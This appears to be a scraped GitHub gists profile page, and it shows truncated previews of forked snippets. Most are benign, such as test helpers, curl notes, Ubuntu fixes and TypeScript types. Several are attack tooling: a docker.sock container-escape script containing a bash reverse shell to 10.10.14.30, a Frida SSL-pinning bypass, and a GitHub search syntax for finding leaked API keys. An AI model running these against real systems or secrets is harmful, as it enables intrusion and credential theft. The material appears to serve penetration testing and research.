😯
1 2 Fizz 4 Buzz

SanariSan

  • krak.ai
  • Georgia, Tbilisi
@SanariSan
SanariSan / make_writable.js
Created May 4, 2024 00:10 — forked from moehlone/make_writable.js
Make JavaScript readonly properties writable (example for overwriting navigator.userAgent; useful for unit tests -> browser detection)
/**
* Creates a read/writable property which returns a function set for write/set (assignment)
* and read/get access on a variable
*
* @param {Any} value initial value of the property
*/
function createProperty(value) {
var _value = value;
/**
@SanariSan
SanariSan / exploit-docker-sock.sh
Created November 6, 2023 05:44 — forked from PwnPeter/exploit-docker-sock.sh
Exploit docker.sock to mount root filesystem in a container
#!/bin/bash
# you can list the available images with
# curl -s --unix-socket /var/run/docker.sock http://localhost/images/json
# here we have sandbox:latest
# command executed when container is started
# change dir to tmp where the root fs is mounted and execute reverse shell
cmd="[\"/bin/sh\",\"-c\",\"chroot /tmp sh -c \\\"bash -c 'bash -i &>/dev/tcp/10.10.14.30/12348 0<&1'\\\"\"]"
@SanariSan
SanariSan / mixunpin.js
Created November 2, 2023 22:03 — forked from incogbyte/mixunpin.js
Frida script to bypass common methods of SSL pinning on Android
console.log("[*] SSL Pinning Bypasses");
console.log(`[*] Your frida version: ${Frida.version}`);
console.log(`[*] Your script runtime: ${Script.runtime}`);
/**
* by incogbyte
* Common functions
* thx apkunpacker, NVISOsecurity, TheDauntless
* Remember that SSL pinning can be custom, and sometimes you need to reverse it using Ghidra, IDA or something like that.
* !!! THIS SCRIPT IS NOT A SILVER BULLET !!

GitHub Search Syntax for Finding API Keys/Secrets/Tokens

As a security professional, it is important to conduct a thorough reconnaissance. With the increasing use of APIs nowadays, it has become paramount to keep access tokens and other API-related secrets secure in order to prevent leaks. However, despite technological advances, human error remains a factor, and many developers still unknowingly hardcode their API secrets into source code and commit them to public repositories. GitHub, being a widely popular platform for public code repositories, may inadvertently host such leaked secrets. To help identify these vulnerabilities, I have created a comprehensive search list using powerful search syntax that enables the search of thousands of leaked keys and secrets in a single search.

Search Syntax:

(path:*.{File_extension1} OR path:*.{File_extension-N}) AND ({Keyname1} OR {Keyname-N}) AND (({Signature/pattern1} OR {Signature/pattern-N}) AND ({PlatformTag1} OR {PlatformTag-N}))

Examples:

**1.

@SanariSan
SanariSan / bookmarklet.js
Created March 24, 2023 17:48 — forked from andyg2/bookmarklet.js
Bookmark-let to summarize a web page using GPT-3 - written by GPT-3
javascript: (function () {
var text = document.body.innerText;
var spl = text.split(" ");
if (spl.length > 3000) {
text = spl.slice(0, 3000).join(" ");
}
fetch('https://api.openai.com/v1/completions', {
method: 'POST',
headers: {
@SanariSan
SanariSan / BscRawTx.ts
Created February 10, 2023 14:26 — forked from WP-LKL/BscRawTx.ts
Binance Smart Chain transaction using web3 and ethereumjs with custom chain and commandline for python.
// Ex. $ npx ts-node BscRawTx.ts --txData=<txData>
// Consult: https://github.com/WP-LKL/bscValueDefi-Exploit, for python use-case
const Tx = require('ethereumjs-tx').Transaction;
const Web3 = require('web3');
import Common from 'ethereumjs-common';
import {parse} from 'ts-command-line-args';
interface input {
txData: string;
@SanariSan
SanariSan / curl.md
Created February 4, 2023 19:48 — forked from subfuzion/curl.md
curl POST examples

Common Options

-#, --progress-bar Make curl display a simple progress bar instead of the more informational standard meter.

-b, --cookie <name=data> Supply cookie with request. If no =, then specifies the cookie file to use (see -c).

-c, --cookie-jar <file name> File to save response cookies to.

This is a collection of Ubuntu fixes for Lenovo Legion 5i

Tested on: Lenovo Legion 5i with below specs:
AMD® Ryzen 7 4800h with radeon graphics × 16
NVIDIA Corporation / NVIDIA GeForce RTX 2060/PCIe/SSE2

1. GPU ISSUES for RTX 2060:

nvidia-driver-470 - HDMI doesn't have to work from the beginning
nvidia-driver-495 - HDMI works from the beginning, unstable (random reboots)

@SanariSan
SanariSan / Every possible TypeScript type.md
Created August 20, 2022 17:58 — forked from laughinghan/Every possible TypeScript type.md
Diagram of every possible TypeScript type

Hasse diagram of every possible TypeScript type

  • any: magic, ill-behaved type that acts like a combination of never (the proper [bottom type]) and unknown (the proper [top type])
    • Anything except never is assignable to any, and any is assignable to anything at all.
    • Identities: any & AnyTypeExpression = any, any | AnyTypeExpression = any
    • Key TypeScript feature that allows for [gradual typing].
  • unknown: proper, well-behaved [top type]
    • Anything at all is assignable to unknown. unknown is only assignable to itself (unknown) and any.
    • Identities: unknown & AnyTypeExpression = AnyTypeExpression, unknown | AnyTypeExpression = unknown
    • Prefer over any whenever possible. Anywhere in well-typed code you're tempted to use any, you probably want unknown.

Generating Authy passwords on other authenticators


There is an increasing number of applications which use Authy for two-factor authentication. However, many users who aren't using Authy have their own authenticator set up already and do not wish to use two applications for generating passwords.

Since I use 1Password for all of my password storing/generating needs, I was looking for a solution to use Authy passwords on that. I couldn't find any completely working solutions, however I stumbled upon a gist by Brian Hartvigsen. His post included some neat code to generate QR codes for you to use on your favorite authenticator.

His method is to extract the secret keys using Authy's Google Chrome app via Developer Tools. If this was not possible, I guess people would be reverse engineering the Android app or something like that. But when I tried that code, nothing appeared on the screen. My guess is that Brian used the